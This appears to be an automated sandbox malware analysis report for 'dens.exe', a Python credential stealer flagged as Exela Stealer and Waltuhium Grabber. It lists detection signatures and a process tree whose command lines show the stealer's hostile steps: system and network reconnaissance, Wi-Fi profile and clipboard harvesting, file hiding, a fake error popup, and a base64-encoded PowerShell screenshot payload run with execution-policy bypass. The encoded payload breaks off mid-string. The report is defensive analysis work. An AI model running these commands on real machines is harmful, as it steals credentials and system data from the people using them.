Edit tour
Windows
Analysis Report
dens.exe
Overview
General Information
Detection
Python Stealer, Exela Stealer, Waltuhium Grabber
Score: | 100 |
Range: | 0 - 100 |
Whitelisted: | false |
Confidence: | 100% |
Signatures
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Capture Wi-Fi password
Suricata IDS alerts for network traffic
Yara detected Exela Stealer
Yara detected Python Stealer
Yara detected Waltuhium Grabber
AI detected suspicious sample
Bypasses PowerShell execution policy
Detected generic credential text file
Encrypted powershell cmdline option found
Found many strings related to Crypto-Wallets (likely being stolen)
Found pyInstaller with non standard icon
Gathers network related connection and port information
Modifies existing user documents (likely ransomware behavior)
Modifies the windows firewall
Overwrites the password of the administrator account
Performs a network lookup / discovery via ARP
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Queries sensitive service information (via WMI, Win32_LogicalDisk, often done to detect sandboxes)
Queries sensitive service information (via WMI, Win32_StartupCommand, often done to detect sandboxes)
Sigma detected: MSHTA Suspicious Execution 01
Sigma detected: Suspicious Encoded PowerShell Command Line
Sigma detected: Suspicious PowerShell Encoded Command Patterns
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to harvest and steal WLAN passwords
Tries to harvest and steal browser information (history, passwords, etc)
Uses attrib.exe to hide files
Uses ipconfig to lookup or modify the Windows network settings
Uses netsh to modify the Windows network and firewall settings
Uses netstat to query active network connections and open ports
Yara detected Generic Python Stealer
AV process strings found (often used to terminate AV products)
Binary contains a suspicious time stamp
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to query CPU information (cpuid)
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a window with clipboard capturing capabilities
Creates files inside the system directory
Detected potential crypto function
Drops PE files
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found evasive API chain checking for process token information
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
PE file contains executable resources (Code or Archives)
PE file contains sections with non-standard names
PE file does not import any functions
Queries disk information (often used to detect virtual machines)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Queries time zone information
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Searches for the Microsoft Outlook file path
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: Console CodePage Lookup Via CHCP
Sigma detected: PowerShell Get-Clipboard Cmdlet Via CLI
Sigma detected: Suspicious Execution of Powershell with Base64
Sigma detected: Suspicious Group And Account Reconnaissance Activity Using Net.EXE
Suricata IDS alerts with low severity for network traffic
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found
Yara detected Credential Stealer
Classification
- System is w10x64
- dens.exe (PID: 6248 cmdline:
"C:\Users\ user\Deskt op\dens.ex e" MD5: 258322C37F4F5C632BD6C79520899603) - dens.exe (PID: 6500 cmdline:
"C:\Users\ user\Deskt op\dens.ex e" MD5: 258322C37F4F5C632BD6C79520899603) - cmd.exe (PID: 5932 cmdline:
C:\Windows \system32\ cmd.exe /c "wmic pat h win32_Vi deoControl ler get na me" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) - conhost.exe (PID: 5296 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - WMIC.exe (PID: 980 cmdline:
wmic path win32_Vide oControlle r get name MD5: C37F2F4F4B3CD128BDABCAEB2266A785) - cmd.exe (PID: 1136 cmdline:
C:\Windows \system32\ cmd.exe /c "wmic com putersyste m get Manu facturer" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) - conhost.exe (PID: 1312 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - WMIC.exe (PID: 3020 cmdline:
wmic compu tersystem get Manufa cturer MD5: C37F2F4F4B3CD128BDABCAEB2266A785) - cmd.exe (PID: 2044 cmdline:
C:\Windows \system32\ cmd.exe /c "gdb --ve rsion" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) - conhost.exe (PID: 3624 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - cmd.exe (PID: 5344 cmdline:
C:\Windows \system32\ cmd.exe /c "tasklist " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) - conhost.exe (PID: 2908 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - tasklist.exe (PID: 6904 cmdline:
tasklist MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA) - cmd.exe (PID: 732 cmdline:
C:\Windows \system32\ cmd.exe /c "wmic pat h Win32_Co mputerSyst em get Man ufacturer" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) - conhost.exe (PID: 3220 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - WMIC.exe (PID: 6432 cmdline:
wmic path Win32_Comp uterSystem get Manuf acturer MD5: C37F2F4F4B3CD128BDABCAEB2266A785) - cmd.exe (PID: 3624 cmdline:
C:\Windows \system32\ cmd.exe /c "wmic csp roduct get uuid" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) - conhost.exe (PID: 4504 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - WMIC.exe (PID: 4632 cmdline:
wmic cspro duct get u uid MD5: C37F2F4F4B3CD128BDABCAEB2266A785) - cmd.exe (PID: 6392 cmdline:
C:\Windows \system32\ cmd.exe /c "tasklist " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) - conhost.exe (PID: 4464 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - tasklist.exe (PID: 1732 cmdline:
tasklist MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA) - cmd.exe (PID: 1344 cmdline:
C:\Windows \system32\ cmd.exe /c "attrib + h +s "C:\U sers\user\ AppData\Lo cal\Waltuh iumUpdateS ervice\Wal tuhium.exe "" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) - conhost.exe (PID: 1076 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - attrib.exe (PID: 6484 cmdline:
attrib +h +s "C:\Use rs\user\Ap pData\Loca l\Waltuhiu mUpdateSer vice\Waltu hium.exe" MD5: 5037D8E6670EF1D89FB6AD435F12A9FD) - cmd.exe (PID: 6560 cmdline:
C:\Windows \system32\ cmd.exe /c "mshta "j avascript: var sh=new ActiveXOb ject('WScr ipt.Shell' ); sh.Popu p('The Pro gram can\x 22t start because ap i-ms-win-c rt-runtime -|l1-1-.dl l is missi ng from yo ur compute r. Try rei nstalling the progra m to fix t his proble m', 0, 'Sy stem Error ', 0+16);c lose()"" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) - conhost.exe (PID: 1136 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - mshta.exe (PID: 2812 cmdline:
mshta "jav ascript:va r sh=new A ctiveXObje ct('WScrip t.Shell'); sh.Popup( 'The Progr am can\x22 t start be cause api- ms-win-crt -runtime-| l1-1-.dll is missing from your computer. Try reins talling th e program to fix thi s problem' , 0, 'Syst em Error', 0+16);clo se()" MD5: 0B4340ED812DC82CE636C00FA5C9BEF2) - cmd.exe (PID: 1748 cmdline:
C:\Windows \system32\ cmd.exe /c "tasklist " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) - conhost.exe (PID: 3428 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - tasklist.exe (PID: 4460 cmdline:
tasklist MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA) - cmd.exe (PID: 6544 cmdline:
C:\Windows \system32\ cmd.exe /c "cmd.exe /c chcp" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) - conhost.exe (PID: 6848 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - cmd.exe (PID: 3624 cmdline:
C:\Windows \system32\ cmd.exe /c "cmd.exe /c chcp" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) - conhost.exe (PID: 2496 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - cmd.exe (PID: 4504 cmdline:
C:\Windows \system32\ cmd.exe /c "tasklist /FO LIST" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) - conhost.exe (PID: 6340 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - tasklist.exe (PID: 4284 cmdline:
tasklist / FO LIST MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA) - cmd.exe (PID: 1352 cmdline:
C:\Windows \system32\ cmd.exe /c "powershe ll.exe Get -Clipboard " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) - conhost.exe (PID: 5960 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - powershell.exe (PID: 1900 cmdline:
powershell .exe Get-C lipboard MD5: 04029E121A0CFA5991749937DD22A1D9) - cmd.exe (PID: 3488 cmdline:
C:\Windows \system32\ cmd.exe /c "netsh wl an show pr ofiles" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) - conhost.exe (PID: 2416 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - netsh.exe (PID: 6392 cmdline:
netsh wlan show prof iles MD5: 6F1E6DD688818BC3D1391D0CC7D597EB) - cmd.exe (PID: 3652 cmdline:
C:\Windows \system32\ cmd.exe /c "echo ### #System In fo#### & s ysteminfo & echo ### #System Ve rsion#### & ver & ec ho ####Hos t Name#### & hostnam e & echo # ###Environ ment Varia ble#### & set & echo ####Logic al Disk### # & wmic l ogicaldisk get capti on,descrip tion,provi dername & echo ####U ser Info## ## & net u ser & echo ####Onlin e User#### & query u ser & echo ####Local Group#### & net loc algroup & echo ####A dministrat ors Info## ## & net l ocalgroup administra tors & ech o ####Gues t User Inf o#### & ne t user gue st & echo ####Admini strator Us er Info### # & net us er adminis trator & e cho ####St artup Info #### & wmi c startup get captio n,command & echo ### #Tasklist# ### & task list /svc & echo ### #Ipconfig# ### & ipco nfig/all & echo #### Hosts#### & type C:\ WINDOWS\Sy stem32\dri vers\etc\h osts & ech o ####Rout e Table### # & route print & ec ho ####Arp Info#### & arp -a & echo #### Netstat### # & netsta t -ano & e cho ####Se rvice Info #### & sc query type = service state= all & echo ## ##Firewall info#### & netsh fir ewall show state & n etsh firew all show c onfig" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) - conhost.exe (PID: 4852 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - systeminfo.exe (PID: 2128 cmdline:
systeminfo MD5: EE309A9C61511E907D87B10EF226FDCD) - WmiPrvSE.exe (PID: 7172 cmdline:
C:\Windows \system32\ wbem\wmipr vse.exe -s ecured -Em bedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51) - HOSTNAME.EXE (PID: 7380 cmdline:
hostname MD5: 33AFAA43B84BDEAB12E02F9DBD2B2EE0) - WMIC.exe (PID: 7400 cmdline:
wmic logic aldisk get caption,d escription ,providern ame MD5: C37F2F4F4B3CD128BDABCAEB2266A785) - net.exe (PID: 7456 cmdline:
net user MD5: 0BD94A338EEA5A4E1F2830AE326E6D19) - net1.exe (PID: 7472 cmdline:
C:\Windows \system32\ net1 user MD5: 55693DF2BB3CBE2899DFDDF18B4EB8C9) - query.exe (PID: 7488 cmdline:
query user MD5: 29043BC0B0F99EAFF36CAD35CBEE8D45) - quser.exe (PID: 7504 cmdline:
"C:\Window s\system32 \quser.exe " MD5: 480868AEBA9C04CA04D641D5ED29937B) - net.exe (PID: 7536 cmdline:
net localg roup MD5: 0BD94A338EEA5A4E1F2830AE326E6D19) - net1.exe (PID: 7560 cmdline:
C:\Windows \system32\ net1 local group MD5: 55693DF2BB3CBE2899DFDDF18B4EB8C9) - net.exe (PID: 7588 cmdline:
net localg roup admin istrators MD5: 0BD94A338EEA5A4E1F2830AE326E6D19) - net1.exe (PID: 7608 cmdline:
C:\Windows \system32\ net1 local group admi nistrators MD5: 55693DF2BB3CBE2899DFDDF18B4EB8C9) - net.exe (PID: 7628 cmdline:
net user g uest MD5: 0BD94A338EEA5A4E1F2830AE326E6D19) - net1.exe (PID: 7640 cmdline:
C:\Windows \system32\ net1 user guest MD5: 55693DF2BB3CBE2899DFDDF18B4EB8C9) - net.exe (PID: 7668 cmdline:
net user a dministrat or MD5: 0BD94A338EEA5A4E1F2830AE326E6D19) - net1.exe (PID: 7680 cmdline:
C:\Windows \system32\ net1 user administra tor MD5: 55693DF2BB3CBE2899DFDDF18B4EB8C9) - WMIC.exe (PID: 7700 cmdline:
wmic start up get cap tion,comma nd MD5: C37F2F4F4B3CD128BDABCAEB2266A785) - tasklist.exe (PID: 7760 cmdline:
tasklist / svc MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA) - ipconfig.exe (PID: 7844 cmdline:
ipconfig / all MD5: 62F170FB07FDBB79CEB7147101406EB8) - ROUTE.EXE (PID: 7868 cmdline:
route prin t MD5: 3C97E63423E527BA8381E81CBA00B8CD) - ARP.EXE (PID: 7884 cmdline:
arp -a MD5: 2AF1B2C042B83437A4BE82B19749FA98) - NETSTAT.EXE (PID: 7900 cmdline:
netstat -a no MD5: 7FDDD6681EA81CE26E64452336F479E6) - sc.exe (PID: 7916 cmdline:
sc query t ype= servi ce state= all MD5: 3FB5CF71F7E7EB49790CB0E663434D80) - netsh.exe (PID: 7940 cmdline:
netsh fire wall show state MD5: 6F1E6DD688818BC3D1391D0CC7D597EB) - netsh.exe (PID: 7968 cmdline:
netsh fire wall show config MD5: 6F1E6DD688818BC3D1391D0CC7D597EB) - cmd.exe (PID: 8040 cmdline:
C:\Windows \system32\ cmd.exe /c "wmic csp roduct get uuid" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) - conhost.exe (PID: 8048 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - WMIC.exe (PID: 8088 cmdline:
wmic cspro duct get u uid MD5: C37F2F4F4B3CD128BDABCAEB2266A785) - cmd.exe (PID: 8128 cmdline:
C:\Windows \system32\ cmd.exe /c "powershe ll.exe -No Profile -E xecutionPo licy Bypas s -Encoded Command JA BzAG8AdQBy AGMAZQAgAD 0AIABAACIA DQAKAHUAcw BpAG4AZwAg AFMAeQBzAH QAZQBtADsA DQAKAHUAcw BpAG4AZwAg AFMAeQBzAH QAZQBtAC4A QwBvAGwAbA BlAGMAdABp AG8AbgBzAC 4ARwBlAG4A ZQByAGkAYw A7AA0ACgB1 AHMAaQBuAG cAIABTAHkA cwB0AGUAbQ AuAEQAcgBh AHcAaQBuAG cAOwANAAoA dQBzAGkAbg BnACAAUwB5 AHMAdABlAG 0ALgBXAGkA bgBkAG8Adw BzAC4ARgBv AHIAbQBzAD sADQAKAA0A CgBwAHUAYg BsAGkAYwAg AGMAbABhAH MAcwAgAFMA YwByAGUAZQ BuAHMAaABv AHQADQAKAH sADQAKACAA IAAgACAAcA B1AGIAbABp AGMAIABzAH QAYQB0AGkA YwAgAEwAaQ BzAHQAPABC AGkAdABtAG EAcAA+ACAA QwBhAHAAdA B1AHIAZQBT AGMAcgBlAG UAbgBzACgA KQANAAoAIA AgACAAIAB7 AA0ACgAgAC AAIAAgACAA IAAgACAAdg BhAHIAIABy AGUAcwB1AG wAdABzACAA PQAgAG4AZQ B3ACAATABp AHMAdAA8AE IAaQB0AG0A YQBwAD4AKA ApADsADQAK ACAAIAAgAC AAIAAgACAA IAB2AGEAcg AgAGEAbABs AFMAYwByAG UAZQBuAHMA IAA9ACAAUw BjAHIAZQBl AG4ALgBBAG wAbABTAGMA cgBlAGUAbg BzADsADQAK AA0ACgAgAC AAIAAgACAA IAAgACAAZg BvAHIAZQBh AGMAaAAgAC gAUwBjAHIA ZQBlAG4AIA BzAGMAcgBl AGUAbgAgAG kAbgAgAGEA bABsAFMAYw ByAGUAZQBu AHMAKQANAA oAIAAgACAA IAAgACAAIA AgAHsADQAK ACAAIAAgAC AAIAAgACAA IAAgACAAIA AgAHQAcgB5 AA0ACgAgAC AAIAAgACAA IAAgACAAIA AgACAAIAB7 AA0ACgAgAC AAIAAgACAA IAAgACAAIA AgACAAIAAg ACAAIAAgAF IAZQBjAHQA YQBuAGcAbA BlACAAYgBv AHUAbgBkAH MAIAA9ACAA cwBjAHIAZQ BlAG4ALgBC AG8AdQBuAG QAcwA7AA0A CgAgACAAIA AgACAAIAAg ACAAIAAgAC AAIAAgACAA IAAgAHUAcw BpAG4AZwAg ACgAQgBpAH QAbQBhAHAA IABiAGkAdA BtAGEAcAAg AD0AIABuAG UAdwAgAEIA aQB0AG0AYQ BwACgAYgBv AHUAbgBkAH MALgBXAGkA ZAB0AGgALA AgAGIAbwB1 AG4AZABzAC 4ASABlAGkA ZwBoAHQAKQ ApAA0ACgAg ACAAIAAgAC AAIAAgACAA IAAgACAAIA AgACAAIAAg AHsADQAKAC AAIAAgACAA IAAgACAAIA AgACAAIAAg ACAAIAAgAC AAIAAgACAA IAB1AHMAaQ BuAGcAIAAo AEcAcgBhAH AAaABpAGMA cwAgAGcAcg BhAHAAaABp AGMAcwAgAD 0AIABHAHIA YQBwAGgAaQ BjAHMALgBG AHIAbwBtAE kAbQBhAGcA ZQAoAGIAaQ B0AG0AYQBw ACkAKQANAA oAIAAgACAA IAAgACAAIA AgACAAIAAg ACAAIAAgAC AAIAAgACAA IAAgAHsADQ AKACAAIAAg ACAAIAAgAC AAIAAgACAA IAAgACAAIA AgACAAIAAg ACAAIAAgAC AAIAAgAGcA cgBhAHAAaA BpAGMAcwAu AEMAbwBwAH kARgByAG8A bQBTAGMAcg BlAGUAbgAo AG4AZQB3AC AAUABvAGkA bgB0ACgAYg BvAHUAbgBk AHMALgBMAG UAZgB0ACwA IABiAG8AdQ BuAGQAcwAu AFQAbwBwAC kALAAgAFAA bwBpAG4AdA AuAEUAbQBw AHQAeQAsAC AAYgBvAHUA bgBkAHMALg BTAGkAegBl ACkAOwANAA oAIAAgACAA IAAgACAAIA AgACAAIAAg ACAAIAAgAC AAIAAgACAA IAAgAH0ADQ AKAA0ACgAg ACAAIAAgAC AAIAAgACAA IAAgACAAIA AgACAAIAAg ACAAIAAgAC AAcgBlAHMA dQBsAHQAcw AuAEEAZABk ACgAKABCAG kAdABtAGEA cAApAGIAaQ B0AG0AYQBw AC4AQwBsAG 8AbgBlACgA KQApADsADQ AKACAAIAAg ACAAIAAgAC AAIAAgACAA IAAgACAAIA AgACAAfQAN AAoAIAAgAC AAIAAgACAA IAAgACAAIA AgACAAfQAN AAoAIAAgAC AAIAAgACAA IAAgACAAIA AgACAAYwBh AHQAYwBoAC AAKABFAHgA YwBlAHAAdA